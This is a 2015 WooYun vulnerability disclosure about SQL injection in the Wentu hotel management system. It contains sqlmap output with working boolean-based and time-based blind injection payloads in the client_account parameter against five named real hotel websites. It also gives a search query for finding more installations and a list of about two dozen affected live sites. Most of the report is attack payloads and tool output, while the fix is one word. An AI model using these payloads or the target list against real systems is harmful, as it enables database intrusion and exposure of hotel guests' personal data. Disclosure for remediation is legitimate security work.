当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0106618

漏洞标题:问途酒店信息管理系统SQL注入漏洞

相关厂商:广州市问途信息技术有限公司

漏洞作者: 路人甲

提交时间:2015-04-09 14:55

修复时间:2015-07-12 14:54

公开时间:2015-07-12 14:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-09: 细节已通知厂商并且等待厂商处理中
2015-04-13: 厂商已经确认,细节仅向厂商公开
2015-04-16: 细节向第三方安全合作伙伴开放
2015-06-07: 细节向核心白帽子及相关领域专家公开
2015-06-17: 细节向普通白帽子公开
2015-06-27: 细节向实习白帽子公开
2015-07-12: 细节向公众公开

简要描述:

详细说明:

谷歌搜索:技术支持: 问途酒店网络营销


1.jpg


案例一:http://www.goldenhotel.com.cn
注册用户,修改资料抓包


2.jpg


3.jpg


4.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: client_account (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: jsoncallback=jQuery18008583418767996372_1428046877163&client_account=sy_hjhj' AND 5892=5892 AND 'hQek'='hQek&language=zh-cn&param={"first_name":"123123","last_name":"1123123","mobile":"13521412321","account_id":"29348923@qq.com","fields":{"title":"%E5%85%88%E7%94%9F","birthday":"123","certificate_type":"%E8%BA%AB%E4%BB%BD%E8%AF%81","certificate":"123123123","company":"","position":"","country":"China , %E4%B8%AD%E5%9B%BD","province":"","city":"","address":"","postcode":"","love_hotel":"%E5%95%86%E5%8A%A1%E6%97%85%E8%A1%8C","smoke":"%E6%9C%89","age":"19-23","love_floor":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_bed":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_far":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_doss":"%E8%AF%B7%E9%80%89%E6%8B%A9"}}&_=1428046902896
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: jsoncallback=jQuery18008583418767996372_1428046877163&client_account=sy_hjhj' AND (SELECT * FROM (SELECT(SLEEP(5)))VrDV) AND 'kWXO'='kWXO&language=zh-cn&param={"first_name":"123123","last_name":"1123123","mobile":"13521412321","account_id":"29348923@qq.com","fields":{"title":"%E5%85%88%E7%94%9F","birthday":"123","certificate_type":"%E8%BA%AB%E4%BB%BD%E8%AF%81","certificate":"123123123","company":"","position":"","country":"China , %E4%B8%AD%E5%9B%BD","province":"","city":"","address":"","postcode":"","love_hotel":"%E5%95%86%E5%8A%A1%E6%97%85%E8%A1%8C","smoke":"%E6%9C%89","age":"19-23","love_floor":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_bed":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_far":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_doss":"%E8%AF%B7%E9%80%89%E6%8B%A9"}}&_=1428046902896
---
back-end DBMS: MySQL 5.0.12
current database:    'dossm'


案例二:http://www.jadesea.cn/
注册用户,修改资料抓包


5.jpg


6.jpg


7.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: client_account (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: jsoncallback=jQuery183002090404491009734_1428047318069&client_account=sy_yhhotel' AND 8130=8130 AND 'VSoO'='VSoO&language=zh-cn&param={"first_name":"123123","last_name":"123123","mobile":"138521412365","account_id":"9283498@qq.com","fields":{"title":"%E5%85%88%E7%94%9F","birthday":"123123","certificate_type":"%E8%BA%AB%E4%BB%BD%E8%AF%81","certificate":"123123","company":"","position":"","country":"China , %E4%B8%AD%E5%9B%BD","province":"","city":"","address":"","postcode":"","love_hotel":"%E5%95%86%E5%8A%A1%E6%97%85%E8%A1%8C","smoke":"%E6%9C%89","age":"","love_floor":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_bed":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_far":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_doss":"%E8%AF%B7%E9%80%89%E6%8B%A9"}}&_=1428047339188
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: jsoncallback=jQuery183002090404491009734_1428047318069&client_account=sy_yhhotel' AND (SELECT * FROM (SELECT(SLEEP(5)))FFYs) AND 'ETTf'='ETTf&language=zh-cn&param={"first_name":"123123","last_name":"123123","mobile":"138521412365","account_id":"9283498@qq.com","fields":{"title":"%E5%85%88%E7%94%9F","birthday":"123123","certificate_type":"%E8%BA%AB%E4%BB%BD%E8%AF%81","certificate":"123123","company":"","position":"","country":"China , %E4%B8%AD%E5%9B%BD","province":"","city":"","address":"","postcode":"","love_hotel":"%E5%95%86%E5%8A%A1%E6%97%85%E8%A1%8C","smoke":"%E6%9C%89","age":"","love_floor":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_bed":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_far":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_doss":"%E8%AF%B7%E9%80%89%E6%8B%A9"}}&_=1428047339188
---
back-end DBMS: MySQL >= 5.0.0
current database:    'dossm'


案例三:http://www.royalmarinaplaza.com
注册,修改资料抓包


1.jpg


2.jpg


3.jpg


漏洞细节:
MYSQL注入
谷歌搜索:技术支持: 问途酒店网络营销
案例一:http://www.goldenhotel.com.cn
注册用户,修改资料抓包
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: client_account (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: jsoncallback=jQuery18008583418767996372_1428046877163&client_account=sy_hjhj' AND 5892=5892 AND 'hQek'='hQek&language=zh-cn&param={"first_name":"123123","last_name":"1123123","mobile":"13521412321","account_id":"29348923@qq.com","fields":{"title":"%E5%85%88%E7%94%9F","birthday":"123","certificate_type":"%E8%BA%AB%E4%BB%BD%E8%AF%81","certificate":"123123123","company":"","position":"","country":"China , %E4%B8%AD%E5%9B%BD","province":"","city":"","address":"","postcode":"","love_hotel":"%E5%95%86%E5%8A%A1%E6%97%85%E8%A1%8C","smoke":"%E6%9C%89","age":"19-23","love_floor":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_bed":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_far":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_doss":"%E8%AF%B7%E9%80%89%E6%8B%A9"}}&_=1428046902896
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: jsoncallback=jQuery18008583418767996372_1428046877163&client_account=sy_hjhj' AND (SELECT * FROM (SELECT(SLEEP(5)))VrDV) AND 'kWXO'='kWXO&language=zh-cn&param={"first_name":"123123","last_name":"1123123","mobile":"13521412321","account_id":"29348923@qq.com","fields":{"title":"%E5%85%88%E7%94%9F","birthday":"123","certificate_type":"%E8%BA%AB%E4%BB%BD%E8%AF%81","certificate":"123123123","company":"","position":"","country":"China , %E4%B8%AD%E5%9B%BD","province":"","city":"","address":"","postcode":"","love_hotel":"%E5%95%86%E5%8A%A1%E6%97%85%E8%A1%8C","smoke":"%E6%9C%89","age":"19-23","love_floor":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_bed":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_far":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_doss":"%E8%AF%B7%E9%80%89%E6%8B%A9"}}&_=1428046902896
---
back-end DBMS: MySQL 5.0.12
current database:    'dossm'
案例二:http://www.jadesea.cn/
注册用户,修改资料抓包
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: client_account (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: jsoncallback=jQuery183002090404491009734_1428047318069&client_account=sy_yhhotel' AND 8130=8130 AND 'VSoO'='VSoO&language=zh-cn&param={"first_name":"123123","last_name":"123123","mobile":"138521412365","account_id":"9283498@qq.com","fields":{"title":"%E5%85%88%E7%94%9F","birthday":"123123","certificate_type":"%E8%BA%AB%E4%BB%BD%E8%AF%81","certificate":"123123","company":"","position":"","country":"China , %E4%B8%AD%E5%9B%BD","province":"","city":"","address":"","postcode":"","love_hotel":"%E5%95%86%E5%8A%A1%E6%97%85%E8%A1%8C","smoke":"%E6%9C%89","age":"","love_floor":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_bed":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_far":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_doss":"%E8%AF%B7%E9%80%89%E6%8B%A9"}}&_=1428047339188
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: jsoncallback=jQuery183002090404491009734_1428047318069&client_account=sy_yhhotel' AND (SELECT * FROM (SELECT(SLEEP(5)))FFYs) AND 'ETTf'='ETTf&language=zh-cn&param={"first_name":"123123","last_name":"123123","mobile":"138521412365","account_id":"9283498@qq.com","fields":{"title":"%E5%85%88%E7%94%9F","birthday":"123123","certificate_type":"%E8%BA%AB%E4%BB%BD%E8%AF%81","certificate":"123123","company":"","position":"","country":"China , %E4%B8%AD%E5%9B%BD","province":"","city":"","address":"","postcode":"","love_hotel":"%E5%95%86%E5%8A%A1%E6%97%85%E8%A1%8C","smoke":"%E6%9C%89","age":"","love_floor":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_bed":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_far":"%E8%AF%B7%E9%80%89%E6%8B%A9","love_doss":"%E8%AF%B7%E9%80%89%E6%8B%A9"}}&_=1428047339188
---
back-end DBMS: MySQL >= 5.0.0
current database:    'dossm'
案例三:http://www.royalmarinaplaza.com
注册,修改资料抓包
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: client_account (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: jsoncallback=jQuery164018857463114227435_1428047679086&client_account=gz_marina' AND 4469=4469 AND 'XXFo'='XXFo&language=zh-cn&param={"last_name":"12312","first_name":"3123","fields":{"title":"%E5%85%88%E7%94%9F","birthday":"123123","certificate_type":"12312","certificate":"12312","email":"3123123@qq.com","phone":"123123123123","phone_type":"%E5%9B%BD%E5%86%85%E7%94%B5%E8%AF%9D","company":"","position":"","country":"%E4%B8%AD%E5%9B%BD","province":"%E5%B9%BF%E4%B8%9C","city":"","address":"","postcode":"","love_hotel":"on","age":"19-23","love_floor":"0","love_bed":"0","love_far":"0","smoke":"yes-smoking","love_doss":"0"}}&_=1428047706785
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: jsoncallback=jQuery164018857463114227435_1428047679086&client_account=gz_marina' AND (SELECT * FROM (SELECT(SLEEP(5)))TyVi) AND 'RIVg'='RIVg&language=zh-cn&param={"last_name":"12312","first_name":"3123","fields":{"title":"%E5%85%88%E7%94%9F","birthday":"123123","certificate_type":"12312","certificate":"12312","email":"3123123@qq.com","phone":"123123123123","phone_type":"%E5%9B%BD%E5%86%85%E7%94%B5%E8%AF%9D","company":"","position":"","country":"%E4%B8%AD%E5%9B%BD","province":"%E5%B9%BF%E4%B8%9C","city":"","address":"","postcode":"","love_hotel":"on","age":"19-23","love_floor":"0","love_bed":"0","love_far":"0","smoke":"yes-smoking","love_doss":"0"}}&_=1428047706785
---
back-end DBMS: MySQL >= 5.0.0
current database:    'dossm'


案例四:http://www.xinyuexinhotel.com
注册,修改资料抓包


1.jpg


2.jpg


3.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: client_account (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: jsoncallback=jQuery191007966794349840756_1428048874667&client_account=yn_sbgarden') AND 9868=9868 AND ('PuSv'='PuSv&language=zh-cn&code=&param={"title":"%E5%A5%B3%E5%A3%AB","last_name":"123123","first_name":"123123","mobile":"13852141232","email":"234923948@qq.com","address":"123123","choose_reason":"%E4%BC%91%E9%97%B2%E5%BA%A6%E5%81%87","elevator":"%E5%96%9C%E6%AC%A2","smoke":"%E6%9C%89","bed_type":"%E5%A4%A7%E5%BA%8A","floor":"%E9%AB%98%E6%A5%BC%E5%B1%82","birthday":"2005-02-01","fields":{"title":"%E5%A5%B3%E5%A3%AB","last_name":"123123","first_name":"123123","mobile":"13852141232","email":"234923948@qq.com","address":"123123","choose_reason":"%E4%BC%91%E9%97%B2%E5%BA%A6%E5%81%87","elevator":"%E5%96%9C%E6%AC%A2","smoke":"%E6%9C%89","bed_type":"%E5%A4%A7%E5%BA%8A","floor":"%E9%AB%98%E6%A5%BC%E5%B1%82","birthday":"2005-02-01"}}&_=1428048874670
---
back-end DBMS: MySQL >= 5.0.0
current database:    'd2'


案例五:http://www.resortintime.com
注册,修改资料抓包


1.jpg


2.jpg


3.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: client_account (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: jsoncallback=jQuery16405680112944196926_1428049876334&client_account=sy_resortintime' AND 6089=6089 AND 'NxGY'='NxGY&language=zh-cn&param={"first_name":"1123","last_name":"123123","fields":{"title":"%E5%85%88%E7%94%9F","birthday":"123","certificate_type":"123","certificate":"123","email":"23848324@qq.com","phone":"123123","phone_type":"%E5%9B%BD%E5%86%85%E7%94%B5%E8%AF%9D","company":"","position":"","country":"%E4%B8%AD%E5%9B%BD","province":"%E5%B9%BF%E4%B8%9C","city":"","address":"","postcode":"","love_hotel":"on","age":"19-23","love_floor":"0","love_bed":"0","love_far":"0","smoke":"yes-smoking","love_doss":"0"}}&_=1428049910430
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: jsoncallback=jQuery16405680112944196926_1428049876334&client_account=sy_resortintime' AND (SELECT * FROM (SELECT(SLEEP(10)))jkrZ) AND 'BqMN'='BqMN&language=zh-cn&param={"first_name":"1123","last_name":"123123","fields":{"title":"%E5%85%88%E7%94%9F","birthday":"123","certificate_type":"123","certificate":"123","email":"23848324@qq.com","phone":"123123","phone_type":"%E5%9B%BD%E5%86%85%E7%94%B5%E8%AF%9D","company":"","position":"","country":"%E4%B8%AD%E5%9B%BD","province":"%E5%B9%BF%E4%B8%9C","city":"","address":"","postcode":"","love_hotel":"on","age":"19-23","love_floor":"0","love_bed":"0","love_far":"0","smoke":"yes-smoking","love_doss":"0"}}&_=1428049910430
---
back-end DBMS: MySQL >= 5.0.0
current database:    'dossm'


列举受影响站点:
http://www.goldenhotel.com.cn
http://www.jadesea.cn
http://www.royalmarinaplaza.com
http://www.expo-gardenhotel.com
http://www.resortintime.com
http://www.glbravohotel.com
http://www.horizonsanya.com
http://www.xlhhotel.com
http://www.prgardenhotel.com.cn
http://www.xinyuexinhotel.com
http://www.vaya-hotel.cn
http://www.norincoeasun.com
http://www.lido-hotel.cn
http://www.easelandhotel.com
http://www.hongfuluxemon.com
http://www.cndhotels.com
http://www.harmonahotel.com
http://www.harmonahotel.com
http://www.tianfuyuan.com
http://www.royalgardenhotel.com.cn
http://www.yingbinhotel.cn
http://www.fcghotel.com
http://www.wx-hotel.com
http://www.dzhgz.com

漏洞证明:

RS

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-04-13 14:52

厂商回复:

CNVD未直接复现所述情况,已经由CNVD通过网站公开联系方式向软件生产厂商通报。

最新状态:

暂无